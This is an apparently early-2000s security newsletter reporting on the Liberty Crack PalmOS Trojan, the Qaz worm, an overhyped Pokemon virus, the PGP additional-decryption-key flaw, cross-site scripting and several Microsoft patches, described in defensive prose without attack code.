The big security news this last week was the PGP encryption flaw, whereby unauthoriized changes to certain types of PGP keys could allow presumed secure communications to be intercepted and decrypted. The technical details can be read on the web page of the researcher who unearthed the problem and the comments of the originator of PGP software should also be checked from the links below.
Apart from that, it has been a rather uneventful week all round, so much of this issue focuses on clearing the initial backlog of Microsft security updates. There is a story about a media hype-fest over a virus that almost no-one in the world has seen and few are likely to and a pointer to an important site for testing the security of your Windows networking configuration -- your PC may be "leaking" more information about you than you'd care to make available, so read the story about the Qaz worm (itself not much of a threat) and check out the link at the end of that item.
"Liberty Crack" first PalmOS malware
Hot on the heels of last week's newsletter reporting the first malware for EPOC handhelds, the first Trojan for PalmOS PDAs was released. This small application (2663 bytes) presents with the icon of the GameBoy emulator, Liberty, and the label "Crack 1.1". It may be described as a crack to patch the freely distributed shareware version of Liberty into a fully registered version. If run, it searches for applications in the handheld, deleting them then trying to reset the device.
There is much controversy over this Trojan, as its author claims it was released "accidentally". He claims to have sent it to a small group of people he trusted but later decided it should not be distributed at all. By the time he recalled it from that first group, at least one of them had distributed it further. The program is now more widely available although there are no confirmed reports, as of this writing, of anyone running it unaware of what it does.
Most antivirus developers have released updates that detect this Trojan. As most PDA software is installed by copying it to a PC or Mac then transferring it via HotSync to the handheld, traditional virus scanners can intercept this program on the PC or Mac before it is loaded into the PDA, should it be innocently acquired. Once their virus definition files have been updated, some scanners may require the the addition of the Palm executable file type to their configuartion to actually detect this Trojan.
Developer unleashes Palm Trojan Horse program - Computerworld.com
Announcements and user discussion threads:
WARNING: fake liberty crack - palmstation.com
Liberty crack: What really happened - palmstation.com
Although first detected three weeks ago and added to most virus scanner's detection databases, there are increasing reports of this Trojan spreading in the wild. Unlike most network malware in the news
recently, Qaz does not send copies of itself to others from its victims' e-mail, but looks for other target machines on the network that are sharing their system drives.
A few years ago, such a spread mechanism would not have been viable, as few machines were so insecurely connected to networks, or at least to the Internet. The advent of DSL and cable modem Internet connections, which are usually always left connected has changed this. Another factor
contributing to the problem of insecure netwroks attached to the Internet is the increased use of "home LANs" -- the networking of two or more computers within a user's home. Many small business and home LAN users have little network administration experience and tend to dsable password protection on shares to remove their hassle value. Coupled with the naive assumption that their OS manufacturer should ship such things with a secure default configuration, the result has been a huge increase in non-password-protected Microsoft networking shares accessible across the Internet (or at least within the dial-up/DSL network of an ISP). There are many tools available to find such vulnerable machines and several viruses and worms also take advantage of this phenomenon.
To protect themselves from Qaz, users should take all the usual precautions. Do not run unexpected attachments from e-mail or unknown programs received through online chat -- although Qaz does not spread itself either way, people may decide to give Qaz a boost via these methods. Regular Internet users with Microsoft OSes should also check that they are not, probably inadvertantly, sharing some or all of their hard drive with the rest of the planet too. The latter is a far from simple thing to test and can be fiddly to fix if found to be "broken", but the link below to the ShieldsUp site at Gibson Research Corporation provides an online test and much useful information on securing Microsoft networking configurations. (You may also find the "spyware" informtion links from the main GRC page an eye-opener too!)
Several media outlets leapt on a completely overblown "virus alert" story just after last week's newsletter was posted out. Variously described as a Trojan, worm or virus depending on which antivirus web site you check, Pokemon (also known as Pokey, and Pikachu after the Pokemon character it depicts) was first seen late in June.
As it has an almost immediate and highly destructive payload, it seemed unlikely it would be much of a threat. Many antivirus developers still claim to have not had a single verified report of this malware from a customer and those that do report very low numbers. The recent media attention was generated by reporters feeding off each other's reports and the "original story" being somewhat misunderstood by the initial reporter and the next one up the line (who really started the whole sorry mess).
I will not embarrass any particular media outlet by referencing their coverage, as most of them ran this story. The link below is to the deja.com archive copy of a message posted in a Usenet newsgroup by an employee of an antivirus company that was reported as the source of the original story. The moral of this story? Beware of journalists interviewing their typewriters...
- Usenet news archived at deja.com
Encryption flaw in PGP
Much concern has been generated over the last few days as the result of the discovery by a German researcher of a flaw in PGP's handling of Additional Decryption Keys (ADKs). ADKs were implemented in PGP to provide a form of key escrow, but in a manner that Phil Zimmerman (the original developer of PGP) was happy with. In theory, ADKs can only be added to a user's public key with the user's consent and someone signing a message with a key that has an ADK has to agree of sign with the ADK as well as the key owner's personal key (which is always used). ADKs are supposed to be signed by the user whose key they are additional to, and that is where the problem arises.
This recent research shows that many v5.x and v6.x releases of PGP will erroneously allow the use of ADKs that are not signed by the key owner. To many, the most worrying thing about this attack is that it is possible completely beyond the key owner's actions. Someone who may be in a position to intercept encrypted communications from the owner of any given key could obtain their key from a public key-server then modify that key by adding a public key of the attacker's making. They could then resubmit the updated key to the key-servers and if anyone used that key in future communications the attacker intercepted, those messages would be able to be decrypted by the attacker.
Since the discovery of this bug in PGP, all keys held on two of the largest public key-servers have been tested for this kind of deliberate tampering and none have been found to be affected. Further, the major
key-servers have been updated so they will not accept keys that have been tampered with in this way. Finally, updates to the current versions of PGP client software have been released with the bug patched so these invalid ADKs cannot be used.
Cross-site scripting vulnerability
Early in February this year, the CERT Coordination Center released an advisory about a form of attack against the integrity of web sites. This has become widely known as the cross-site scripting vulnerability or CSS. The nature of this form of attack is such that there is little that end users themselves can do to prevent it or even reduce their potential exposure except disable scripting in their wb browsers. Of course, that reduces the functionality of many web sites, rendering some unnavigable.
The essential problem with CSS is that some web server design issues, and many web site programming practices, allow a user to provide "text" that is ultimately delivered to another user as part of a web page. If care is not taken in sanitizing the material provided by the first user, a malicious person code easily include HTML tags in the "text" they provide. Careless handling of that text would then present that user-submitted HTML code as part of a page subsequently served to another user. The second user may have a higher trust of some sites than others, allowing scripts (which are emebdded into HTML using tags) to run based on that trust relationship, which could be compromised by a CSS flaw in a site's design.
There are many other, more subtle, CSS tricks than simply embedding script tags into user-submitted content. All web site developers who have not already carefully considered CERT's CA-2000-02 advisory on CSS issues should do so. Further, web server maintainers should check their server's vendors for updates to the server software itself, as most server software has been updated to address some CSS weaknesses -- links to the major web server vendors are included in the CERT advisory.
IIS cross-site scripting update
Microsoft has (finally) released updates for versions 4 and 5 of IIS that address some server-based CSS vulnerabilities. The v5 update is post-SP1 for Windows 2000 users (but does not require SP1). Anyone running IIS web servers that generate dynamic web pages is recomended to test and rollout these updates. Web site developers hosting pages on IIS servers should read the detailed coverage of CSS issues linked from the security bulletin.
Multiple Microsoft IIS updates
While on the topic of IIS updates, if IIS users are updating their servers, they also check they have the following updates installed. The first two apply to both versions 4 and 5 of IIS, while the third is specific to IIS v5. The third is unnecessary if the Windows 2000 SP1 has been applied to the server.
MS Security Bulletins and FAQs:
Microsoft Money password vulnerability
A flaw in the way Microsoft Money stores passwords for its data file can result in the password being written into the file in plain text. Should this happen and other users have ready access to your Money data file, your personal data could be compromised. Note that Microsoft states in the Security Bulletin covering this problem that it is "important to note that password protection in Money is not intended to be a substitute for file-level access control, and even in the absence of this vulnerability, customers need to protect such files." One wonders how clear that really is to most Money users...
This vulnerability affects Money 2000 and Money 2001. A more detailed description and, more importantly, a patch are available from the Microsoft Product Security links below.
Microsoft Office document files may "phone home"
Recognized on-line privacy advocate, Richard Smith, has uncovered a potential user-tracking mechanism involving Microsoft Office products. Writing as CTO of the Privacy Foundation, Smith has described the result of research done at the foundation showing how the concept of "web bugs" can easily be implemented in documents created in several popular Microsoft Offfice products.
products are vulnerable to similar use through their support for including graphics files specified via URL. As in the more traditional web bugs case just described, such graphics are stored on a web server and are retrieved for display when the Office application opens a document containing such links.
The Privacy Foundation says it has no evidence of Office documents being used this way. However, it is concerned that Microsoft does not acknowledge that the use of Internet Explorer to retrieve URL-linked graphics in its Office aaplications means that servers hosting such graphics can read and set cookies on the machine reading documents carrying such graphics. Microsoft denies this is a particularly serious problem and seems bemused that only its products have been singled out.